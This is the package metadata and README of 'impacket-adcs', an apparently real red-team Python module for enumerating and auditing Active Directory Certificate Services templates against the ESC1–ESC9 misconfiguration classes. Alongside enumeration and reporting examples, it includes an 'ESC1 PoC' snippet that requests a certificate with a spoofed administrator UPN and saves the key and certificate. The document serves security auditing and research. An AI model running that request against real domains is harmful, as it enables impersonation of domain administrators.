Metadata-Version: 2.4
Name: impacket-adcs
Version: 0.1.0
Summary: Active Directory Certificate Services (AD CS) enumeration, vulnerability analysis, and certificate request module for Impacket
Home-page: https://github.com/MrHarshvardhan/impacket-adcs
Author: MrHarshvardhan
Author-email: buddy4130@gmail.com
License: Apache Software License 2.0
Keywords: impacket,active-directory,adcs,certificates,penetration-testing,red-team,esc1,esc6,pki,kerberos,ldap,security-research
Classifier: Development Status :: 3 - Alpha
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: Science/Research
Classifier: License :: OSI Approved :: Apache Software License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Classifier: Topic :: System :: Networking
Requires-Python: >=3.8
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: impacket>=0.11.0
Requires-Dist: cryptography>=3.4
Requires-Dist: pyasn1>=0.4
Provides-Extra: dev
Requires-Dist: pytest>=7.0; extra == "dev"
Requires-Dist: pytest-cov; extra == "dev"
Requires-Dist: build; extra == "dev"
Requires-Dist: twine; extra == "dev"
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: keywords
Dynamic: license
Dynamic: license-file
Dynamic: provides-extra
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary

# impacket-adcs

Active Directory Certificate Services (AD CS) enumeration, analysis, and certificate request module for the [Impacket](https://github.com/fortra/impacket) ecosystem.

---

## Overview

This module provides:

- **LDAP-based enumeration** of CA enrollment services and certificate templates
- **Vulnerability analysis** covering ESC1–ESC4 and ESC6–ESC9 (SpecterOps "Certified Pre-Owned"); ESC5 is not yet implemented
- **Certificate request engine** via MS-ICPR RPC and HTTP Web Enrollment
- **Structured reporting** in text, Markdown, and JSON formats
- **Clean Python API** following Impacket's module conventions

## Installation

```bash
pip install impacket-adcs
# or from source:
git clone https://github.com/MrHarshvardhan/impacket-adcs
cd impacket-adcs
pip install -e ".[dev]"
```

## Quick Start

### Command-line

```bash
# Password auth
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01.corp.local

# NTLM hash
python examples/adcs_enum.py corp.local/jdoe@dc01 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

# Kerberos (reads from KRB5CCNAME)
python examples/adcs_enum.py corp.local/jdoe@dc01 -k -no-pass

# Output to Markdown report
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01 -output report -format markdown

# Show only vulnerable objects
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01 -vuln-only

# JSON output (pipe to jq)
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01 -format json | jq .findings
```

### Python API

```python
from impacket.ldap import ldap
from impacket_adcs import ADCSEnumerator, ADCSAnalyzer, ADCSReporter

# 1. Authenticate
conn = ldap.LDAPConnection('ldap://dc01.corp.local', 'dc=corp,dc=local')
conn.login('jdoe', 'Password1', 'corp.local')

# 2. Enumerate
enumerator = ADCSEnumerator(conn, 'corp.local')
snapshot = enumerator.enumerate()

# 3. Analyze
analyzer = ADCSAnalyzer()
analyzer.analyze(snapshot)

# 4. Report
reporter = ADCSReporter(snapshot)
print(reporter.to_text())
reporter.save('adcs_findings.md', fmt='markdown')
reporter.save('adcs_findings.json', fmt='json')
```

### Certificate Request (ESC1 PoC)

```python
from impacket.dcerpc.v5 import transport, icpr
from impacket_adcs import CertificateRequester

# Set up RPC transport
rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:DC01[\pipe\cert]')
rpctransport.set_credentials('jdoe', 'Password1', 'corp.local')
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(icpr.MSRPC_UUID_ICPR)

# Request cert with spoofed UPN (ESC1)
requester = CertificateRequester(dce_connection=dce)
key_pem, cert_pem = requester.request_certificate(
    ca_name='corp-DC01-CA',
    template='VulnerableTemplate',
    subject='CN=jdoe',
    san_upn='administrator@corp.local',   # ESC1: arbitrary UPN
)

with open('admin.key', 'wb') as f:
    f.write(key_pem)
with open('admin.crt', 'wb') as f:
    f.write(cert_pem)
print("[+] Certificate issued for administrator@corp.local")
```

---

## Vulnerability Coverage

| Class | Description | Severity |
|-------|-------------|----------|
| ESC1  | Enrollee-supplied SAN + auth EKU + low enroll rights | CRITICAL |
| ESC2  | Any Purpose EKU or no EKU | HIGH |
| ESC3  | Enrollment Agent template accessible to low-priv users | HIGH |
| ESC4  | Template ACL grants write to low-priv principal | HIGH |
| ESC6  | CA allows user-specified SAN (EDITF_ATTRIBUTESUBJECTALTNAME2) | CRITICAL |
| ESC7  | CA ACL grants ManageCA/ManageCertificates to low-priv users | HIGH |
| ESC8  | HTTP Web Enrollment endpoint vulnerable to NTLM relay | HIGH |
| ESC9  | Certificate lacks NTDS CA Security Extension | MEDIUM |

ESC5, ESC10, ESC11, and ESC13 are not yet implemented (contributions welcome).
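
The template-side conditions behind the ESC1, ESC2 and ESC9 rows can be audited offline from a template's LDAP attributes. The sketch below is an added example, not code from impacket-adcs: `audit_template`, the `enroll_sids` key (enrollment rights assumed already extracted from the template's security descriptor) and the sample templates are assumptions made for illustration.

```python
# Added example; dict layout and function names are assumptions, not impacket-adcs code.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag (manager approval)
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000      # msPKI-Enrollment-Flag
ANY_PURPOSE, CLIENT_AUTH = "2.5.29.37.0", "1.3.6.1.5.5.7.3.2"
# Authentication-capable EKUs: the two above plus PKINIT Client Authentication, Smart Card Logon
AUTH_EKUS = {ANY_PURPOSE, CLIENT_AUTH, "1.3.6.1.5.2.3.4", "1.3.6.1.4.1.311.20.2.2"}
LOW_PRIV_SIDS = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}  # Everyone, Authenticated Users, Users
LOW_PRIV_RIDS = {"513", "515"}                           # Domain Users, Domain Computers


def is_low_priv(sid):
    """True for well-known broad groups and the domain-relative low-privilege RIDs."""
    return sid in LOW_PRIV_SIDS or (sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[1] in LOW_PRIV_RIDS)


def audit_template(t):
    """Return the sorted ESC classes (ESC1, ESC2, ESC9 only) a template dict matches."""
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    name_flag = t.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = t.get("msPKI-Enrollment-Flag", 0)
    exposed = any(is_low_priv(s) for s in t.get("enroll_sids", []))
    # Manager approval or required RA signatures gate issuance.
    gated = bool(enroll_flag & CT_FLAG_PEND_ALL_REQUESTS) or t.get("msPKI-RA-Signature", 0) > 0
    allows_auth = not ekus or bool(ekus & AUTH_EKUS)  # an empty EKU list permits any usage
    findings = set()
    if exposed and not gated:
        if name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and allows_auth:
            findings.add("ESC1")
        if not ekus or ANY_PURPOSE in ekus:
            findings.add("ESC2")
        if enroll_flag & CT_FLAG_NO_SECURITY_EXTENSION and allows_auth:
            findings.add("ESC9")  # template-side condition only
    return sorted(findings)


def tpl(name_flag, enroll_flag, ra_sigs, ekus, sids):
    return {"msPKI-Certificate-Name-Flag": name_flag, "msPKI-Enrollment-Flag": enroll_flag,
            "msPKI-RA-Signature": ra_sigs, "pKIExtendedKeyUsage": ekus, "enroll_sids": sids}


DOMAIN = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed domain SID
SAMPLES = {  # constructed templates, not taken from a real directory
    "VulnerableTemplate": tpl(0x1, 0x0, 0, [CLIENT_AUTH], [DOMAIN + "-513"]),
    "ApprovalRequired": tpl(0x1, 0x2, 0, [CLIENT_AUTH], [DOMAIN + "-513"]),
    "AdminsOnly": tpl(0x1, 0x0, 0, [CLIENT_AUTH], [DOMAIN + "-512"]),
    "NoEku": tpl(0x0, 0x0, 0, [], ["S-1-5-11"]),
    "NoSidExtension": tpl(0x0, 0x00080000, 0, [CLIENT_AUTH], ["S-1-5-11"]),
}
```

Requiring manager approval, requiring authorized signatures, or restricting enrollment rights each clears the ESC1 and ESC2 findings here, which matches the remediation order usually applied to such templates.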

---

## Architecture

```
impacket_adcs/
├── __init__.py          # Public API surface
├── constants.py         # OIDs, bitmasks, LDAP attribute names
├── structures.py        # Dataclasses: CertificateTemplate, CertificateAuthority, etc.
├── enumerator.py        # LDAP-based discovery (ADCSEnumerator)
├── analyzer.py          # ESC vulnerability detection (ADCSAnalyzer)
├── requester.py         # Certificate enrollment via RPC/HTTP (CertificateRequester)
└── reporter.py          # Text/Markdown/JSON output (ADCSReporter)

examples/
└── adcs_enum.py         # CLI entry point

tests/
└── test_analyzer.py     # Unit tests (pytest, no AD required)
```

---

## Running Tests

```bash
pip install pytest
python -m pytest tests/ -v
```

All tests are offline — no Active Directory connection required.

---

## Protocol References

- [MS-WCCE]: Windows Client Certificate Enrollment Protocol
- [MS-ICPR]: ICertPassage Remote Protocol
- [MS-ADTS]: Active Directory Technical Specification, section 3.1.1.5 (PKI objects)
- [MS-CRTD]: Certificate Templates Structure, sections 2.27–2.28
- RFC 5280: Internet X.509 PKI Certificate and CRL Profile
- SpecterOps "Certified Pre-Owned" (Schroeder & Christensen, 2021)

---

## Relationship to Existing Tools

This module complements rather than replaces existing tools:

| Tool | Language | Protocol | This module's advantage |
|------|----------|----------|------------------------|
| [Certipy](https://github.com/ly4k/Certipy) | Python | LDAP+RPC | Impacket-native integration |
| [Certify](https://github.com/GhostPack/Certify) | C# (.NET) | LDAP+DCOM | Pure Python, no .NET |
| [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit) | PowerShell | ADCS API | Remote, no PS execution |

---

## Contributing

Contributions welcome. Priority areas:

1. ESC5, ESC10, ESC11, ESC13 detection
2. Full CMC request wrapping for ESC3 (PKCS#7 SignedData)
3. SID-to-name resolution via LDAP
4. LDAPS support
5. Kerberos PKINIT post-exploitation module (separate PR)

Please follow Impacket's contribution guidelines and include tests for all new ESC checks.

---
